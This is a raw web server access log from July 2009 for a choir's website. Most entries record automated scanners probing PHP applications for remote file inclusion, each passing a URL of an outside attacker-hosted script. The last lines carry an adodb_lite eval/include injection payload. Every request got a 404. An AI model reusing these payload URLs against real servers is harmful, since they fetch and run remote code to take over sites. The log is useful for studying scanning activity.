194.109.22.67 - - [04/Jul/2009:08:44:44 -0700] "GET /phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.67 - - [04/Jul/2009:08:44:44 -0700] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.67 - - [04/Jul/2009:08:44:46 -0700] "GET /logs/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.117 - - [04/Jul/2009:08:45:02 -0700] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.117 - - [04/Jul/2009:08:45:02 -0700] "GET /logs/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.117 - - [04/Jul/2009:08:45:03 -0700] "GET /phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.67 - - [04/Jul/2009:08:45:47 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.109 - - [04/Jul/2009:08:45:56 -0700] "GET /logs/access_090414.log/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.117 - - [04/Jul/2009:08:46:05 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:08:46:07 -0700] "GET /logs/access_090626.log//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.0.136.1 - - [04/Jul/2009:08:46:09 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
124.0.136.1 - - [04/Jul/2009:08:46:09 -0700] "GET /logs/access.log%20/phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
124.0.136.1 - - [04/Jul/2009:08:46:09 -0700] "GET /phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:08:46:29 -0700] "GET /logs/access_090612.log//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:46:50 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:46:50 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:46:50 -0700] "GET /logs/access_090528.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:47:05 -0700] "GET /logs/access_090603.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:47:27 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:47:28 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:47:28 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:47:31 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:47:31 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:47:32 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:47:32 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:47:32 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:47:32 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:47:46 -0700] "GET /logs//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:47:46 -0700] "GET /logs/access_090626.log//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:47:47 -0700] "GET /_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
124.0.136.1 - - [04/Jul/2009:08:48:14 -0700] "GET /logs/access_090603.log/index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
124.0.136.1 - - [04/Jul/2009:08:48:14 -0700] "GET /logs/index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
124.0.136.1 - - [04/Jul/2009:08:48:17 -0700] "GET /index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
194.109.22.109 - - [04/Jul/2009:08:48:22 -0700] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.109 - - [04/Jul/2009:08:48:23 -0700] "GET /phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.109 - - [04/Jul/2009:08:48:30 -0700] "GET /logs/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.117 - - [04/Jul/2009:08:48:32 -0700] "GET /logs/access.log%20/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:48:37 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
194.109.22.67 - - [04/Jul/2009:08:48:38 -0700] "GET /logs/access.log%20/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:48:47 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:48:47 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.80.195.34 - - [04/Jul/2009:08:48:48 -0700] "GET / HTTP/1.0" 200 1708 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98; FunWebProducts)" "americanboyschoir.com"
194.109.22.109 - - [04/Jul/2009:08:50:06 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:08:51:20 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:08:51:20 -0700] "GET /logs/access_090517.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:08:51:20 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:08:51:25 -0700] "GET /logs/access_090603.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:51:49 -0700] "GET /logs/access_090626.log%20//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:08:52:05 -0700] "GET /logs/access_090517.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:08:52:33 -0700] "GET /logs/access_090603.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.0.136.1 - - [04/Jul/2009:08:53:02 -0700] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:06 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:06 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:06 -0700] "GET /logs/access_090410.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:18 -0700] "GET /logs/access_090203.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:19 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:19 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:19 -0700] "GET /logs/access.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:26 -0700] "GET /logs/access.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:26 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:26 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:50 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:50 -0700] "GET /logs/access_090410.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:53:50 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:54:02 -0700] "GET /logs/access_090203.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
194.109.22.109 - - [04/Jul/2009:08:54:21 -0700] "GET /logs/access.log%20/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
124.0.136.1 - - [04/Jul/2009:08:54:38 -0700] "GET /logs/access_090626.log/phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
87.106.179.130 - - [04/Jul/2009:08:59:22 -0700] "GET /logs/access_090603.log/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.106.179.130 - - [04/Jul/2009:08:59:22 -0700] "GET /logs/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.106.179.130 - - [04/Jul/2009:08:59:22 -0700] "GET /index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:59:22 -0700] "GET /logs/access_090103.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:59:25 -0700] "GET /logs/access_090103.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:09:00:05 -0700] "GET /logs/access_090103.log%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:09:00:08 -0700] "GET /logs/access_090103.log%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
87.106.179.130 - - [04/Jul/2009:09:02:03 -0700] "GET /logs/access_090414.log/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
82.194.87.219 - - [04/Jul/2009:09:03:22 -0700] "GET /logs///poll/booth.php?include_path=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.americanboyschoir.com"
82.194.87.219 - - [04/Jul/2009:09:03:24 -0700] "GET /logs///poll/booth.php?include_path=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:04:22 -0700] "GET /logs/access_090626.log//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:04:23 -0700] "GET /logs//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:04:23 -0700] "GET /_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:04:31 -0700] "GET /_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:04:31 -0700] "GET /logs/access_090626.log//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:04:32 -0700] "GET /logs//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:04:49 -0700] "GET /logs/access_090626.log//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:04:49 -0700] "GET /_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:04:49 -0700] "GET /logs//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:05:16 -0700] "GET /logs/access_090626.log//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:05:16 -0700] "GET /_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:05:17 -0700] "GET /logs//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:06:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:06:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:06:13 -0700] "GET /logs/access_090603.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:06:23 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:06:23 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:06:23 -0700] "GET /logs/access_090603.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:06:42 -0700] "GET /logs/access_090414.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:06:45 -0700] "GET /logs/access_090414.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:07:43 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:07:44 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:08:00 -0700] "GET /logs/access_090603.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:08:09 -0700] "GET /logs/access_090603.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:08:14 -0700] "GET /logs/access_090414.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:08:21 -0700] "GET /logs/access_090414.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:10:08 -0700] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:10:08 -0700] "GET /adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:10:08 -0700] "GET /logs/access_090517.log%20%20//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:10:11 -0700] "GET /adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:10:11 -0700] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
